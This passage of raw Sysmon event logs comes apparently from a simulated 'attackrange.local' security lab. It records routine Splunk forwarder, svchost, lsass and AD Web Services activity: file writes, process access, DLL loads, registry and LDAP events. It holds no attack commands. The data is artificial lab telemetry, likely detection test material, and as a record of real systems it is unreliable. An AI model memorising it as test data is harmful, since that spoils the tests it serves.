Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344401Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:12.463{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B7FA3909462AB033A710626CF0D221E,SHA256=2C87B3D992C31FEE68F59C000BE5DCE47C3418EEBB9A7AEDBA6CAF81E0D05573falsetrue 10341000x800000000000000021219286Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:12.357{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5AD0-618E-01CE-08000000F101}600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219285Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:12.357{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219284Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:12.357{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219283Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:12.357{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219282Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:12.357{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219281Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:12.357{AD5E2759-5432-6143-0500-00000000F101}412428C:\Windows\system32\csrss.exe{AD5E2759-5AD0-618E-01CE-08000000F101}600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219280Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:12.357{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5AD0-618E-01CE-08000000F101}600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219279Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:12.342{AD5E2759-5AD0-618E-01CE-08000000F101}600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219278Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:11.997{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=38A832277DF4898193BE3A0EFAE6B7A5,SHA256=0487E9FAB89872798F357181633A287E47AB1DC66DEDF9929F6DC8F01F316764,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344400Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:12.163{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344399Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:12.163{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8438AFF0F19E71E3EAF36B96BB7B0D3,SHA256=BFC0ECF0E4CF9F54427F3C04B5F4583553D74F63A0CB6A71ADD71CA6A39D45C3falsetrue 534500x800000000000000057344398Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:12.094{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057344397Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:12.094{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057344396Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:12.079{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057344395Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:12.079{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 23542300x800000000000000021219291Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:13.450{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C681EAFBBFC3C6D5B4CCA8BA92ED1043,SHA256=244D75456034F98A1B5235815053A421A04D8143CC2E6C17177BEBE0F969A522,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344404Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:13.477{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344403Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:13.477{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09E2BEF7DA52F69CB785F134C2A5BEF4,SHA256=AD1FDCDDEE1059A6A7F45B5F65B559FDE7AE8AAD84562D21F3E76990C4470B51falsetrue 23542300x800000000000000021219290Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:13.356{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DBF1C455FB11DC1D812436AF70F480A9,SHA256=834FB16485C0E5A3C363E695326C31522D2767513A0B1A317828EA47E1CEBD90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057344411Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:45.597{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54507-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057344410Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:14.561{8B6011A9-886D-6164-1200-00000000F101}460C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-10-11 18:54:38.077 23542300x800000000000000057344409Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:14.561{8B6011A9-886D-6164-1200-00000000F101}460NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=726F88141901F8B5728F753E7B1B4426,SHA256=E6406F6A79CBD81484F7E174AB88476A6B706868C4D7252AF801F74B3D1B472Bfalsetrue 11241100x800000000000000057344408Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:14.477{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344407Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:14.477{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6F50ABE936C653709A59DFAD406AAD6,SHA256=F17CEDC200154D5D24DB1BFF0359D922BD8A8ACA81D83D5EB0CF1D4A46C9138Afalsetrue 354300x800000000000000021219293Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:01.619{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64300-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219292Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:14.450{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75998EF452600E4E645FCC0483EB07B8,SHA256=BAC0BA3BE1A7CE01E788E77E264E7CDCD88CA6B778E97A8FBF4F3443C6D20A14,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344406Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:14.277{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344405Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:14.277{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DDA5599BA9E82CD1353039CAD5DCEF8A,SHA256=49AB45C898CA8692EF70E83F1F1E0EAE28294CB936C7EF539BD84615DDF681F4falsetrue 11241100x800000000000000057344413Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:15.507{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344412Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:15.507{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4408F21A48DDF96533598B3871FB92BA,SHA256=2DCEDC3C7387F77BB9FE13DD95A276E23564048E09FA3645B806A5A93AC06CBDfalsetrue 23542300x800000000000000021219294Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:15.450{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=478A8C1A388D240A855D3BCBB5E3E5DA,SHA256=FE188A0DCAEC2A58FCE0477BF5B8C853663DEEB919090A78E6E88CFE3B0AED42,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219295Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:16.450{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C84E2668FBC8A922EE9C8256714D18D0,SHA256=C0DB76DB3A81CE881F2E50B50947769C9C10DE67E0EB72B73123833E6CA18806,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344415Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:16.507{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344414Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:16.507{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CEA4F33368D89B0738739E1724CD37A,SHA256=429BA880A32F3152A55B66EABA42DE2BE2F361D0B99201921F48876C0C6FEB68falsetrue 23542300x800000000000000021219297Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:17.453{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D38A85FEB8E0D1940B360CE30356DB79,SHA256=EF4E58DCF9026698D2244E436FC9F350EE79BD88F090BB5C079878898E59DE6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344417Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:17.526{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344416Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:17.526{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8597477DB647BB3405DB15D54F7434DD,SHA256=8B1D45FDE35C2360E30534735F989E295FE4931233A8E2354CCE1888E02070ECfalsetrue 23542300x800000000000000021219296Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:17.298{AD5E2759-5433-6143-1A00-00000000F101}1972NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-09909a0b10b828df0\channels\health\respondent-20210916142702-79906MD5=8085950F126672766A1DF0580C539A31,SHA256=836015C54DD1F9176CE157D9E23B9B47C196C9CF50DD587B63CC20EE15FEF46E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344421Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:18.574{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344420Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:18.574{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C03B6BFC53D3AC772008F177315269B,SHA256=68C224939B9086C1B371ACE5E44D9E77D12655C77FF8DBD74C06930DC3E02F81falsetrue 23542300x800000000000000021219300Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:18.467{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC6DA7DE0DA8840CAD1FA033284AEC10,SHA256=0F6A04D0BCFDEE93BB1A0542D40AA9BB7475D6F7D74BB0073025EE1D6A53B692,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219299Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:18.297{AD5E2759-5433-6143-1A00-00000000F101}1972NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-09909a0b10b828df0\channels\health\surveyor-20210916142700-79907MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219298Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:18.141{AD5E2759-5433-6143-0D00-00000000F101}7923680C:\Windows\system32\svchost.exe{AD5E2759-A1B2-6168-2961-04000000F101}3520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x800000000000000057344419Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:18.374{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057344418Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:18.374{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 354300x800000000000000057344429Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:50.726{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local54508-true0:0:0:0:0:0:0:1win-dc-469.attackrange.local389ldap 354300x800000000000000057344428Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:50.726{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local54508-true0:0:0:0:0:0:0:1win-dc-469.attackrange.local389ldap 11241100x800000000000000057344427Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:19.589{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344426Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:19.589{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8BF5E26EECC5C4364960E9674AD3C40,SHA256=B491AEF571E147FEF29E36CA41BE49FE81548D15A3A733B005CD468ADF74DD37falsetrue 23542300x800000000000000021219301Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:19.470{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program 